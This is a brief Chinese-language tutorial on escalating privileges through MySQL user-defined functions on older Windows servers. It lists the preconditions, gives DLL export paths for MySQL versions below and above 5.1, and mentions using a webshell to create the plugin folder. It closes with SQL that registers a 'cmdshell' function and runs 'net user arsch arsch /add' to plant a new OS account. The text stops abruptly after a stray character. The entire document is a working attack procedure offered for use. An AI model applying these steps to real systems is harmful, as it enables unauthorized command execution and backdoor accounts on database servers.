一、适用条件
1.目标系统是Windows(Win2000,XP,Win2003);
2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语)。
3.有root账号密码
二、导出udf
MYSQL 5.1以下版本导出路径:
C:Winntudf.dll 2000
C:Windowsudf.dll 2003(有的系统被转义,需要改为C:Windowsudf.dll)
导出DLL文件,导出时请勿必注意导出路径(一般情况下对任何目录可写,无需考虑权限问题)
MYSQL
5.1以上版本,必须要把udf.dll文件放到MYSQL安装目录下的libplugin文件夹下才能创建自定义函数
可以再mysql里输入
select @@basedir
show variables like
‘%plugins%’ 寻找mysql安装路径
该目录默认是不存在的,这就需要我们使用webshell找到MYSQL的安装目录,并在安装目录下创建libplugin文件夹,然后将udf.dll文件导出到该目录即可。
三、提权
使用SQL语句创建功能函数。语法:Create Function 函数名(函数名只能为下面列表中的其中之一)returns
string soname ‘导出的DLL路径’;
create function cmdshell returns string soname ‘udf.dll’
select cmdshell(‘net user arsch arsch /add’);
s